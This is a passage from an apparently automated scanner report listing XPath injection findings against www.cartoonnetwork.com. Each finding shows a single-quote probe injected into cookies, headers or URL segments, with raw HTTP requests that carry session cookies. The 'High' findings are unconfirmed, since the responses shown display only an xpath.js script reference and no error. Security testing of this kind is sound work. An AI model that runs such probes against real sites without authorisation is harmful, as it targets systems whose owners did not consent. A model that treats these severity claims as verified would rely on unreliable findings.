The s_sq cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the s_sq cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /profiles/Able/Achilles/Aviator/index.html HTTP/1.1
Host: www.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=CC72A05A472B9301B04A0982EFC37290; s_cc=true; route=r.ctns1jive3; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; s_sq=carnetnmcom%3D%2526pid%253DCN%25253A%252520/schedule/index.html%2526pidt%253D1%2526oid%253Djavascript%25253ALoginModule.showLoginWindow%252528%25257Bvisible%25253A%252520true%25257D%25252C%252520%252527login%252527%252529%25253B%2526ot%253DA'; adDEon=true; 1401316autoFreqCap=0; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&;

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 03:00:18 GMT
Server: Apache
Cache-Control: max-age=60, private
Expires: Sat, 11 Dec 2010 03:01:07 GMT
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Content-Length: 43074
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- Only Logged in users looking at his page should get here
...[SNIP]...
<script language="JavaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.93. http://www.cartoonnetwork.com/profiles/Able/Achilles/Aviator/index.html [s_vi cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /profiles/Able/Achilles/Aviator/index.html

Issue detail

The s_vi cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the s_vi cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /profiles/Able/Achilles/Aviator/index.html HTTP/1.1
Host: www.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=CC72A05A472B9301B04A0982EFC37290; s_cc=true; route=r.ctns1jive3; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]'; s_sq=carnetnmcom%3D%2526pid%253DCN%25253A%252520/schedule/index.html%2526pidt%253D1%2526oid%253Djavascript%25253ALoginModule.showLoginWindow%252528%25257Bvisible%25253A%252520true%25257D%25252C%252520%252527login%252527%252529%25253B%2526ot%253DA; adDEon=true; 1401316autoFreqCap=0; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&;

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 03:00:18 GMT
Server: Apache
Cache-Control: max-age=60, private
Expires: Sat, 11 Dec 2010 03:01:07 GMT
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Content-Length: 43074
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- Only Logged in users looking at his page should get here
...[SNIP]...
<script language="JavaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.94. http://www.cartoonnetwork.com/profiles/AchieveServices [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /profiles/AchieveServices

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /profiles'/AchieveServices?action=get&def=player_activity&key=player_id&data= HTTP/1.1
Host: www.cartoonnetwork.com
Proxy-Connection: keep-alive
Referer: http://www.cartoonnetwork.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; 1401316autoFreqCap=0; JSESSIONID=64F8C046E37955CEF1117B75D610270A; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&; adDEon=true

Response

HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 02:46:28 GMT
Server: Apache
Cache-Control: private
Content-Type: text/html
Vary: User-Agent,Accept-Encoding
Content-Length: 22047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:spry="http://ns.ado
...[SNIP]...
<script language="javaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.95. http://www.cartoonnetwork.com/profiles/Acoustic/Jasmine/Genius/index.html [1401316autoFreqCap cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /profiles/Acoustic/Jasmine/Genius/index.html

Issue detail

The 1401316autoFreqCap cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the 1401316autoFreqCap cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /profiles/Acoustic/Jasmine/Genius/index.html HTTP/1.1
Host: www.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=CC72A05A472B9301B04A0982EFC37290; s_cc=true; route=r.ctns1jive3; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; s_sq=carnetnmcom%3D%2526pid%253DCN%25253A%252520/schedule/index.html%2526pidt%253D1%2526oid%253Djavascript%25253ALoginModule.showLoginWindow%252528%25257Bvisible%25253A%252520true%25257D%25252C%252520%252527login%252527%252529%25253B%2526ot%253DA; adDEon=true; 1401316autoFreqCap=0'; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&;

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 03:01:12 GMT
Server: Apache
Cache-Control: max-age=60, private
Expires: Sat, 11 Dec 2010 03:01:57 GMT
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Content-Length: 43183
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- Only Logged in users looking at his page should get here
...[SNIP]...
<script language="JavaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.96. http://www.cartoonnetwork.com/profiles/Acoustic/Jasmine/Genius/index.html [JSESSIONID cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /profiles/Acoustic/Jasmine/Genius/index.html

Issue detail

The JSESSIONID cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the JSESSIONID cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /profiles/Acoustic/Jasmine/Genius/index.html HTTP/1.1
Host: www.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=CC72A05A472B9301B04A0982EFC37290'; s_cc=true; route=r.ctns1jive3; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; s_sq=carnetnmcom%3D%2526pid%253DCN%25253A%252520/schedule/index.html%2526pidt%253D1%2526oid%253Djavascript%25253ALoginModule.showLoginWindow%252528%25257Bvisible%25253A%252520true%25257D%25252C%252520%252527login%252527%252529%25253B%2526ot%253DA; adDEon=true; 1401316autoFreqCap=0; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&;

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 03:01:06 GMT
Server: Apache
Cache-Control: max-age=60, private
Expires: Sat, 11 Dec 2010 03:01:58 GMT
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Content-Length: 43183
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- Only Logged in users looking at his page should get here
...[SNIP]...
<script language="JavaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.97. http://www.cartoonnetwork.com/profiles/Acoustic/Jasmine/Genius/index.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /profiles/Acoustic/Jasmine/Genius/index.html

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /profiles'/Acoustic/Jasmine/Genius/index.html HTTP/1.1
Host: www.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=CC72A05A472B9301B04A0982EFC37290; s_cc=true; route=r.ctns1jive3; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; s_sq=carnetnmcom%3D%2526pid%253DCN%25253A%252520/schedule/index.html%2526pidt%253D1%2526oid%253Djavascript%25253ALoginModule.showLoginWindow%252528%25257Bvisible%25253A%252520true%25257D%25252C%252520%252527login%252527%252529%25253B%2526ot%253DA; adDEon=true; 1401316autoFreqCap=0; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 03:01:15 GMT
Server: Apache
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 22047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:spry="http://ns.ado
...[SNIP]...
<script language="javaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.98. http://www.cartoonnetwork.com/profiles/Acoustic/Jasmine/Genius/index.html [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /profiles/Acoustic/Jasmine/Genius/index.html

Issue detail

The REST URL parameter 2 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 2, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /profiles/Acoustic'/Jasmine/Genius/index.html HTTP/1.1
Host: www.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=CC72A05A472B9301B04A0982EFC37290; s_cc=true; route=r.ctns1jive3; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; s_sq=carnetnmcom%3D%2526pid%253DCN%25253A%252520/schedule/index.html%2526pidt%253D1%2526oid%253Djavascript%25253ALoginModule.showLoginWindow%252528%25257Bvisible%25253A%252520true%25257D%25252C%252520%252527login%252527%252529%25253B%2526ot%253DA; adDEon=true; 1401316autoFreqCap=0; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 03:01:18 GMT
Server: Apache
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 22047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:spry="http://ns.ado
...[SNIP]...
<script language="javaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.99. http://www.cartoonnetwork.com/profiles/Acoustic/Jasmine/Genius/index.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /profiles/Acoustic/Jasmine/Genius/index.html

Issue detail

The REST URL parameter 3 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 3, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /profiles/Acoustic/Jasmine'/Genius/index.html HTTP/1.1
Host: www.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=CC72A05A472B9301B04A0982EFC37290; s_cc=true; route=r.ctns1jive3; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; s_sq=carnetnmcom%3D%2526pid%253DCN%25253A%252520/schedule/index.html%2526pidt%253D1%2526oid%253Djavascript%25253ALoginModule.showLoginWindow%252528%25257Bvisible%25253A%252520true%25257D%25252C%252520%252527login%252527%252529%25253B%2526ot%253DA; adDEon=true; 1401316autoFreqCap=0; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 03:01:20 GMT
Server: Apache
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 22047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:spry="http://ns.ado
...[SNIP]...
<script language="javaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.100. http://www.cartoonnetwork.com/profiles/Acoustic/Jasmine/Genius/index.html [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /profiles/Acoustic/Jasmine/Genius/index.html

Issue detail

The REST URL parameter 4 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 4, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /profiles/Acoustic/Jasmine/Genius'/index.html HTTP/1.1
Host: www.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=CC72A05A472B9301B04A0982EFC37290; s_cc=true; route=r.ctns1jive3; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; s_sq=carnetnmcom%3D%2526pid%253DCN%25253A%252520/schedule/index.html%2526pidt%253D1%2526oid%253Djavascript%25253ALoginModule.showLoginWindow%252528%25257Bvisible%25253A%252520true%25257D%25252C%252520%252527login%252527%252529%25253B%2526ot%253DA; adDEon=true; 1401316autoFreqCap=0; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 03:01:22 GMT
Server: Apache
Cache-Control: private
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 22047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:spry="http://ns.ado
...[SNIP]...
<script language="javaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.101. http://www.cartoonnetwork.com/profiles/Acoustic/Jasmine/Genius/index.html [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /profiles/Acoustic/Jasmine/Genius/index.html

Issue detail

The REST URL parameter 5 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 5, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /profiles/Acoustic/Jasmine/Genius/index.html' HTTP/1.1
Host: www.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=CC72A05A472B9301B04A0982EFC37290; s_cc=true; route=r.ctns1jive3; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; s_sq=carnetnmcom%3D%2526pid%253DCN%25253A%252520/schedule/index.html%2526pidt%253D1%2526oid%253Djavascript%25253ALoginModule.showLoginWindow%252528%25257Bvisible%25253A%252520true%25257D%25252C%252520%252527login%252527%252529%25253B%2526ot%253DA; adDEon=true; 1401316autoFreqCap=0; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Sat, 11 Dec 2010 03:01:25 GMT
Server: Apache
Cache-Control: private
Content-Type: text/html
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Length: 22047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:spry="http://ns.ado
...[SNIP]...
<script language="javaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.102. http://www.cartoonnetwork.com/profiles/Acoustic/Jasmine/Genius/index.html [Referer HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /profiles/Acoustic/Jasmine/Genius/index.html

Issue detail

The Referer HTTP header appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the Referer HTTP header, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /profiles/Acoustic/Jasmine/Genius/index.html HTTP/1.1
Host: www.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=CC72A05A472B9301B04A0982EFC37290; s_cc=true; route=r.ctns1jive3; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; s_sq=carnetnmcom%3D%2526pid%253DCN%25253A%252520/schedule/index.html%2526pidt%253D1%2526oid%253Djavascript%25253ALoginModule.showLoginWindow%252528%25257Bvisible%25253A%252520true%25257D%25252C%252520%252527login%252527%252529%25253B%2526ot%253DA; adDEon=true; 1401316autoFreqCap=0; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&;
Referer: http://www.google.com/search?hl=en&q='

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 03:01:14 GMT
Server: Apache
Cache-Control: max-age=60, private
Expires: Sat, 11 Dec 2010 03:02:14 GMT
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 43183

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- Only Logged in users looking at his page should get here
...[SNIP]...
<script language="JavaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.103. http://www.cartoonnetwork.com/profiles/Acoustic/Jasmine/Genius/index.html [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /profiles/Acoustic/Jasmine/Genius/index.html

Issue detail

The User-Agent HTTP header appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the User-Agent HTTP header, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /profiles/Acoustic/Jasmine/Genius/index.html HTTP/1.1
Host: www.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'
Connection: close
Cookie: JSESSIONID=CC72A05A472B9301B04A0982EFC37290; s_cc=true; route=r.ctns1jive3; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; s_sq=carnetnmcom%3D%2526pid%253DCN%25253A%252520/schedule/index.html%2526pidt%253D1%2526oid%253Djavascript%25253ALoginModule.showLoginWindow%252528%25257Bvisible%25253A%252520true%25257D%25252C%252520%252527login%252527%252529%25253B%2526ot%253DA; adDEon=true; 1401316autoFreqCap=0; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&;

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 03:01:14 GMT
Server: Apache
Cache-Control: max-age=60, private
Expires: Sat, 11 Dec 2010 03:02:14 GMT
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Length: 43183

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- Only Logged in users looking at his page should get here
...[SNIP]...
<script language="JavaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.104. http://www.cartoonnetwork.com/profiles/Acoustic/Jasmine/Genius/index.html [adDEmas cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /profiles/Acoustic/Jasmine/Genius/index.html

Issue detail

The adDEmas cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the adDEmas cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /profiles/Acoustic/Jasmine/Genius/index.html HTTP/1.1
Host: www.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=CC72A05A472B9301B04A0982EFC37290; s_cc=true; route=r.ctns1jive3; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; s_sq=carnetnmcom%3D%2526pid%253DCN%25253A%252520/schedule/index.html%2526pidt%253D1%2526oid%253Djavascript%25253ALoginModule.showLoginWindow%252528%25257Bvisible%25253A%252520true%25257D%25252C%252520%252527login%252527%252529%25253B%2526ot%253DA; adDEon=true; 1401316autoFreqCap=0; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&';

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 03:01:13 GMT
Server: Apache
Cache-Control: max-age=60, private
Expires: Sat, 11 Dec 2010 03:02:00 GMT
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Content-Length: 43183
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- Only Logged in users looking at his page should get here
...[SNIP]...
<script language="JavaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.105. http://www.cartoonnetwork.com/profiles/Acoustic/Jasmine/Genius/index.html [adDEon cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /profiles/Acoustic/Jasmine/Genius/index.html

Issue detail

The adDEon cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the adDEon cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /profiles/Acoustic/Jasmine/Genius/index.html HTTP/1.1
Host: www.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=CC72A05A472B9301B04A0982EFC37290; s_cc=true; route=r.ctns1jive3; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; s_sq=carnetnmcom%3D%2526pid%253DCN%25253A%252520/schedule/index.html%2526pidt%253D1%2526oid%253Djavascript%25253ALoginModule.showLoginWindow%252528%25257Bvisible%25253A%252520true%25257D%25252C%252520%252527login%252527%252529%25253B%2526ot%253DA; adDEon=true'; 1401316autoFreqCap=0; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&;

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 03:01:11 GMT
Server: Apache
Cache-Control: max-age=60, private
Expires: Sat, 11 Dec 2010 03:01:57 GMT
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Content-Length: 43183
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- Only Logged in users looking at his page should get here
...[SNIP]...
<script language="JavaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.106. http://www.cartoonnetwork.com/profiles/Acoustic/Jasmine/Genius/index.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /profiles/Acoustic/Jasmine/Genius/index.html

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the name of an arbitrarily supplied request parameter, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /profiles/Acoustic/Jasmine/Genius/index.html?1'=1 HTTP/1.1
Host: www.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=CC72A05A472B9301B04A0982EFC37290; s_cc=true; route=r.ctns1jive3; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; s_sq=carnetnmcom%3D%2526pid%253DCN%25253A%252520/schedule/index.html%2526pidt%253D1%2526oid%253Djavascript%25253ALoginModule.showLoginWindow%252528%25257Bvisible%25253A%252520true%25257D%25252C%252520%252527login%252527%252529%25253B%2526ot%253DA; adDEon=true; 1401316autoFreqCap=0; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&;

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 03:01:14 GMT
Server: Apache
Cache-Control: max-age=60, private
Expires: Sat, 11 Dec 2010 03:01:59 GMT
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Content-Length: 43183
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- Only Logged in users looking at his page should get here
...[SNIP]...
<script language="JavaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.107. http://www.cartoonnetwork.com/profiles/Acoustic/Jasmine/Genius/index.html [route cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /profiles/Acoustic/Jasmine/Genius/index.html

Issue detail

The route cookie appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the route cookie, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request

GET /profiles/Acoustic/Jasmine/Genius/index.html HTTP/1.1
Host: www.cartoonnetwork.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=CC72A05A472B9301B04A0982EFC37290; s_cc=true; route=r.ctns1jive3'; s_vi=[CS]v1|2681726C051D112C-40000103C04C4A5B[CE]; s_sq=carnetnmcom%3D%2526pid%253DCN%25253A%252520/schedule/index.html%2526pidt%253D1%2526oid%253Djavascript%25253ALoginModule.showLoginWindow%252528%25257Bvisible%25253A%252520true%25257D%25252C%252520%252527login%252527%252529%25253B%2526ot%253DA; adDEon=true; 1401316autoFreqCap=0; adDEmas=R00&broadband&theplanet.com&73&usa&618&77002&44&16&U1&Y2&18&;

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 03:01:08 GMT
Server: Apache
Cache-Control: max-age=60, private
Expires: Sat, 11 Dec 2010 03:01:58 GMT
Content-Type: text/html
Vary: Accept-Encoding,User-Agent
Content-Length: 43183
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- Only Logged in users looking at his page should get here
...[SNIP]...
<script language="JavaScript" type="text/javascript" src="/tools/js/spry/xpath.js">
...[SNIP]...

2.108. http://www.cartoonnetwork.com/profiles/Acoustic/Jasmine/Genius/index.html [s_cc cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.cartoonnetwork.com
Path:   /profiles/Acoustic/Jasmine/Genius/index.html

Issue detail

